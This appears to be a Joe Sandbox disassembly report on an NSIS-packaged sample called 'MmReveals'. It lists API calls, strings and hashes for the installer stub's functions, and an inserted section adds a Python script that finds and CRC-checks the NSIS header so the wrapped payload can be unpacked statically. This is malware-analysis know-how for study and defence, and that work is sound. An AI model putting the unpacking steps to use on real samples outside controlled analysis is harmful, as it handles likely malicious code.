                          • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                          • API String ID: 2872004960-3619442763
                          • Opcode ID: 2a82ad59b9370b3cc3d5141fac41001cfacad1d5dd7d37275e8bf63d0114621f
                          • Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
                          • Opcode Fuzzy Hash: 2a82ad59b9370b3cc3d5141fac41001cfacad1d5dd7d37275e8bf63d0114621f
                          • Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE

                          Control-flow Graph

                          APIs
                            • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                            • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                            • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                          • lstrcatW.KERNEL32(004D30C0,00447240), ref: 004059AE
                          • lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
                          • lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
                          • GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E
                            • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
                          • RegisterClassW.USER32(0046AD60), ref: 00405B0A
                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
                          • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B
                            • Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30
                          • ShowWindow.USER32(00000005,00000000), ref: 00405B91
                          • LoadLibraryW.KERNEL32(RichEd20), ref: 00405BA2
                          • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
                          • GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
                          • GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
                          • RegisterClassW.USER32(0046AD60), ref: 00405BD3
                          • DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                          • String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                          • API String ID: 608394941-1650083594
                          • Opcode ID: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                          • Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
                          • Opcode Fuzzy Hash: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                          • Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E

                          Control-flow Graph

                          APIs
                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                          • lstrcatW.KERNEL32(00000000,00000000), ref: 00401A76
                          • CompareFileTime.KERNEL32(-00000014,?,open,open,00000000,00000000,open,004CB0B0,00000000,00000000), ref: 00401AA0
                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                            • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
                            • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                            • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                          • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$open
                          • API String ID: 4286501637-2478300759
                          • Opcode ID: 2ab80255bde4e5d1782dd9130ab292fdec73e4a72f9567b243a786bab725b233
                          • Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
                          • Opcode Fuzzy Hash: 2ab80255bde4e5d1782dd9130ab292fdec73e4a72f9567b243a786bab725b233
                          • Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE

                          Control-flow Graph

                          control_flow_graph 428 403587-4035d5 GetTickCount GetModuleFileNameW call 405e50 431 4035e1-40360f call 406009 call 406751 call 406009 GetFileSize 428->431 432 4035d7-4035dc 428->432 440 403615 431->440 441 4036fc-40370a call 4032d2 431->441 433 4037b6-4037ba 432->433 443 40361a-403631 440->443 447 403710-403713 441->447 448 4037c5-4037ca 441->448 445 403633 443->445 446 403635-403637 call 403336 443->446 445->446 452 40363c-40363e 446->452 450 403715-40372d call 403368 call 403336 447->450 451 40373f-403769 GlobalAlloc call 403368 call 40337f 447->451 448->433 450->448 478 403733-403739 450->478 451->448 476 40376b-40377c 451->476 454 403644-40364b 452->454 455 4037bd-4037c4 call 4032d2 452->455 460 4036c7-4036cb 454->460 461 40364d-403661 call 405e0c 454->461 455->448 464 4036d5-4036db 460->464 465 4036cd-4036d4 call 4032d2 460->465 461->464 475 403663-40366a 461->475 472 4036ea-4036f4 464->472 473 4036dd-4036e7 call 407281 464->473 465->464 472->443 477 4036fa 472->477 473->472 475->464 481 40366c-403673 475->481 482 403784-403787 476->482 483 40377e 476->483 477->441 478->448 478->451 481->464 484 403675-40367c 481->484 485 40378a-403792 482->485 483->482 484->464 486 40367e-403685 484->486 485->485 487 403794-4037af SetFilePointer call 405e0c 485->487 486->464 488 403687-4036a7 486->488 491 4037b4 487->491 488->448 490 4036ad-4036b1 488->490 492 4036b3-4036b7 490->492 493 4036b9-4036c1 490->493 491->433 492->477 492->493 493->464 494 4036c3-4036c5 493->494 494->464
                          APIs
                          • GetTickCount.KERNEL32 ref: 00403598
                          • GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4
                            • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                            • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                          • GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600
                          Strings
                           • Installer integrity check has failed. Common causes include incomplete download and damaged media. Contact the installer's author , xrefs: 004037C5
                          • soft, xrefs: 00403675
                          • Error launching installer, xrefs: 004035D7
                          • Inst, xrefs: 0040366C
                          • Null, xrefs: 0040367E
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: File$AttributesCountCreateModuleNameSizeTick
                           • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes include incomplete download and damaged media. Contact the installer's author $Null$soft
                          • API String ID: 4283519449-527102705
                          • Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                          • Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
                          • Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                          • Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C
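
                           Worked example (added for this report; it is not Joe Sandbox output and not code from the sample): the function above at 00403587 opens its own image (GetModuleFileNameW, CreateFileW, GetFileSize), scans it for the NSIS "firstheader" (the "Null" / "soft" / "Inst" dword compares at 0040366C, 00403675 and 0040367E) and aborts with "Installer integrity check has failed" when the declared data length or the trailing CRC does not match. The Python below reproduces that check on an arbitrary file so the wrapped payload can be located for static unpacking. The header layout (flags, 0xDEADBEEF, "NullsoftInst", header length, length of all following data, CRC32 over everything before the trailing dword) comes from my reading of the NSIS source, not from this report, and the search is byte-granular where the stub only probes 512-byte aligned offsets; the input image is constructed inside the block.

```python
"""Locate and integrity-check the NSIS 'firstheader' in an installer image.

Added example for this report (not code from the sample, NSIS or Joe
Sandbox).  The firstheader layout and CRC placement follow the NSIS
source (Source/exehead/fileform.h and Main.c) as I know them; they are
assumptions of this example, not facts the report states.
"""
import struct
import zlib

FH_SIG = 0xDEADBEEF
FH_MAGIC = b"NullsoftInst"               # the "Null" / "soft" / "Inst" dword compares
FH_FMT = "<II12sII"                      # flags, siginfo, nsinst[3], length_of_header,
FH_SIZE = struct.calcsize(FH_FMT)        #   length_of_all_following_data -> 28 bytes
FH_FLAGS_NO_CRC = 0x4                    # CRC check is skipped when this flag is set


def find_firstheader(data: bytes):
    """Return (offset, flags, length_of_header, length_of_all_following_data) or None.

    The stub probes only 512-byte aligned offsets; searching every byte
    also finds headers appended at odd offsets (more general than the stub).
    """
    needle = struct.pack("<I", FH_SIG) + FH_MAGIC
    idx = data.find(needle)
    if idx < 4:                          # the flags dword precedes the signature
        return None
    off = idx - 4
    flags, _sig, _magic, hdr_len, data_len = struct.unpack_from(FH_FMT, data, off)
    return off, flags, hdr_len, data_len


def integrity_check(data: bytes) -> str:
    """Mimic the stub's startup checks: 'ok', 'no_header', 'truncated' or 'bad_crc'.

    The stub reports "Installer integrity check has failed" when the declared
    following data does not fit in the file or, unless FH_FLAGS_NO_CRC is
    set, when the CRC32 of everything before the trailing dword differs
    from that dword.
    """
    found = find_firstheader(data)
    if found is None:
        return "no_header"
    off, flags, _hdr_len, data_len = found
    end = off + data_len
    if data_len < FH_SIZE + 4 or end > len(data):
        return "truncated"
    if flags & FH_FLAGS_NO_CRC:
        return "ok"
    stored = struct.unpack_from("<I", data, end - 4)[0]
    actual = zlib.crc32(data[: end - 4]) & 0xFFFFFFFF
    return "ok" if actual == stored else "bad_crc"


def build_sample(hdr: bytes, body: bytes, flags: int = 0, stub_len: int = 512) -> bytes:
    """Construct a minimal NSIS-like image: fake stub, firstheader, header, body, CRC.

    The stub bytes are a constructed placeholder, not a real PE.
    """
    stub = b"MZ" + b"\x90" * (stub_len - 2)
    data_len = FH_SIZE + len(hdr) + len(body) + 4   # counts the header and the CRC
    fh = struct.pack(FH_FMT, flags, FH_SIG, FH_MAGIC, len(hdr), data_len)
    image = stub + fh + hdr + body
    crc = zlib.crc32(image) & 0xFFFFFFFF
    return image + struct.pack("<I", crc)


if __name__ == "__main__":
    img = build_sample(b"\x00" * 64, b"payload-bytes")
    print(find_firstheader(img), integrity_check(img))
    print(integrity_check(img[:-1]))     # one byte short of the declared data
```

                           To apply this to the dropped or submitted file, read it with open(path, "rb").read() and pass the bytes to integrity_check; the offset returned by find_firstheader plus FH_SIZE is where the NSIS header block (and after it the compressed data) begins.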

                          Control-flow Graph

                          control_flow_graph 495 40337f-403396 496 403398 495->496 497 40339f-4033a7 495->497 496->497 498 4033a9 497->498 499 4033ae-4033b3 497->499 498->499 500 4033c3-4033d0 call 403336 499->500 501 4033b5-4033be call 403368 499->501 505 4033d2 500->505 506 4033da-4033e1 500->506 501->500 507 4033d4-4033d5 505->507 508 4033e7-403407 GetTickCount call 4072f2 506->508 509 403518-40351a 506->509 510 403539-40353d 507->510 521 403536 508->521 523 40340d-403415 508->523 511 40351c-40351f 509->511 512 40357f-403583 509->512 514 403521 511->514 515 403524-40352d call 403336 511->515 516 403540-403546 512->516 517 403585 512->517 514->515 515->505 530 403533 515->530 519 403548 516->519 520 40354b-403559 call 403336 516->520 517->521 519->520 520->505 532 40355f-403572 WriteFile 520->532 521->510 526 403417 523->526 527 40341a-403428 call 403336 523->527 526->527 527->505 533 40342a-403433 527->533 530->521 534 403511-403513 532->534 535 403574-403577 532->535 536 403439-403456 call 407312 533->536 534->507 535->534 537 403579-40357c 535->537 540 40350a-40350c 536->540 541 40345c-403473 GetTickCount 536->541 537->512 540->507 542 403475-40347d 541->542 543 4034be-4034c2 541->543 544 403485-4034bb MulDiv wsprintfW call 404f72 542->544 545 40347f-403483 542->545 546 4034c4-4034c7 543->546 547 4034ff-403502 543->547 544->543 545->543 545->544 550 4034e7-4034ed 546->550 551 4034c9-4034db WriteFile 546->551 547->523 548 403508 547->548 548->521 552 4034f3-4034f7 550->552 551->534 554 4034dd-4034e0 551->554 552->536 556 4034fd 552->556 554->534 555 4034e2-4034e5 554->555 555->552 556->521
                          APIs
                          • GetTickCount.KERNEL32 ref: 004033E7
                          • GetTickCount.KERNEL32 ref: 00403464
                          • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
                          • wsprintfW.USER32 ref: 004034A4
                          • WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
                          • WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A
                          Strings
                          • ... %d%%, xrefs: 0040349E
                          • X1C, xrefs: 0040343C
                          • OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO, xrefs: 004033A9
                          • X1C, xrefs: 004033ED
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: CountFileTickWrite$wsprintf
                          • String ID: ... %d%%$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO$X1C$X1C
                          • API String ID: 651206458-1396068033
                          • Opcode ID: 71a0af70068d15f1e2712f5ef5f0e4f02d53f291cdcd50b6d0822de58acd1dbf
                          • Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
                          • Opcode Fuzzy Hash: 71a0af70068d15f1e2712f5ef5f0e4f02d53f291cdcd50b6d0822de58acd1dbf
                          • Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9

                          Control-flow Graph

                          control_flow_graph 557 401eb9-401ec4 558 401f24-401f26 557->558 559 401ec6-401ec9 557->559 560 401f53-401f7b GlobalAlloc call 406805 558->560 561 401f28-401f2a 558->561 562 401ed5-401ee3 call 4062a3 559->562 563 401ecb-401ecf 559->563 576 4030e3-4030f2 560->576 577 402387-40238d GlobalFree 560->577 565 401f3c-401f4e call 406009 561->565 566 401f2c-401f36 call 4062a3 561->566 574 401ee4-402702 call 406805 562->574 563->559 567 401ed1-401ed3 563->567 565->577 566->565 567->562 573 401ef7-402e50 call 406009 * 3 567->573 573->576 589 402708-40270e 574->589 577->576 589->576
                          APIs
                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                          • GlobalFree.KERNELBASE(00891120), ref: 00402387
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: FreeGloballstrcpyn
                          • String ID: Exch: stack < %d elements$Pop: stack empty$open
                          • API String ID: 1459762280-1711415406
                          • Opcode ID: 4c8c09c83ece9067cd01ebc7f99896dd0048823aea7dafec600988da42eaf391
                          • Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
                          • Opcode Fuzzy Hash: 4c8c09c83ece9067cd01ebc7f99896dd0048823aea7dafec600988da42eaf391
                          • Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD

                          Control-flow Graph

                          control_flow_graph 592 4022fd-402325 call 40145c GetFileVersionInfoSizeW 595 4030e3-4030f2 592->595 596 40232b-402339 GlobalAlloc 592->596 596->595 597 40233f-40234e GetFileVersionInfoW 596->597 599 402350-402367 VerQueryValueW 597->599 600 402384-40238d GlobalFree 597->600 599->600 603 402369-402381 call 405f51 * 2 599->603 600->595 603->600
                          APIs
                          • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                          • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                          • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                          • VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360
                            • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                          • GlobalFree.KERNELBASE(00891120), ref: 00402387
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                          • String ID:
                          • API String ID: 3376005127-0
                          • Opcode ID: 8c326ffdf613bec965b24eefbd291de90d56381beca0eea403caad45aa1d2aeb
                          • Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
                          • Opcode Fuzzy Hash: 8c326ffdf613bec965b24eefbd291de90d56381beca0eea403caad45aa1d2aeb
                          • Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19

                          Control-flow Graph

                          control_flow_graph 608 402b23-402b37 GlobalAlloc 609 402b39-402b49 call 401446 608->609 610 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 608->610 615 402b70-402b73 609->615 610->615 616 402b93 615->616 617 402b75-402b8d call 405f6a WriteFile 615->617 618 4030e3-4030f2 616->618 617->616 622 402384-40238d GlobalFree 617->622 622->618
                          APIs
                          • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                          • WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                          • lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                          • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                          • String ID:
                          • API String ID: 2568930968-0
                          • Opcode ID: a43f8298630559bd8253c369c7e0cb3863940d209ccab43e1d506770e08af364
                          • Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
                          • Opcode Fuzzy Hash: a43f8298630559bd8253c369c7e0cb3863940d209ccab43e1d506770e08af364
                          • Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68

                          Control-flow Graph

                          control_flow_graph 711 4021b5-40220b call 40145c * 4 call 404f72 ShellExecuteW 722 402223-4030f2 call 4062a3 711->722 723 40220d-40221b call 4062a3 711->723 723->722
                          APIs
                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                            • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
                            • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                            • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                          • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202
                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                          Strings
                          • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                          • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                          • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                          • API String ID: 3156913733-2180253247
                          • Opcode ID: a6f9f0949098482436c6c9f8cce42b162511fb53d9db31c2e6f8192b5b466978
                          • Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
                          • Opcode Fuzzy Hash: a6f9f0949098482436c6c9f8cce42b162511fb53d9db31c2e6f8192b5b466978
                          • Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139

                          Control-flow Graph

